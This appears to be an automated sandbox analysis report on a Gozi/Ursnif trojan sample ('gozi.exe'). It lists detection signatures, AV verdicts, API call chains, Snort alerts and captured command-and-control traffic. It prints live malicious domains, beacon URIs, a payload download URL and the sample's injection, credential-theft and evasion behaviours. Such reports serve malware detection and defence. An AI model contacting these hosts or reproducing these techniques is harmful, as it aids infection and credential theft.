Windows Analysis Report gozi.exe

Overview

General Information

Sample Name: gozi.exe
Analysis ID: 551701
MD5: 8ee79738c37a919fdf38dc5a621556ce
SHA1: ae35e761cd1633fa8b70bda3c2e3649c1694ffd1
SHA256: 51037666d1982db93e3123e88594d409805d3f1d970e9f926dcadb99f77f50f6
Tags: exegozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Csc.exe Source File Folder
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH Avira URL Cloud: Label: malware
Source: http://apr.intooltak.com/vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: gozi.exe Virustotal: Detection: 38% Perma Link
Source: gozi.exe Metadefender: Detection: 40% Perma Link
Source: gozi.exe ReversingLabs: Detection: 65%
Antivirus / Scanner detection for submitted sample
Source: gozi.exe Avira: detected
Machine Learning detection for sample
Source: gozi.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 8.0.RegAsm.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.32857b4.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.0.RegAsm.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.329b084.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A7479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 8_2_010A7479
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: gozi.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source: Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source: Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F18409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 8_2_03F18409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 47_2_03052ECF

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49820 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 185.189.12.123:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: io.immontyr.com
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
Source: global traffic HTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com
Source: RegAsm.exe, 00000008.00000003.412693608.0000000000E93000.00000004.00000001.sdmp String found in binary or memory: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cmgR
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.ux2
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.537650333.0000020337C61000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: gozi.exe, 00000002.00000002.328074082.0000000003263000.00000004.00000001.sdmp String found in binary or memory: http://transfer.sh
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp String found in binary or memory: https://transfer.sh
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp String found in binary or memory: https://transfer.sh/get/3dvhcv/lia.exe
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp String found in binary or memory: https://transfer.sh4jl
Source: unknown DNS traffic detected: queries for: transfer.sh
Source: global traffic HTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown HTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com
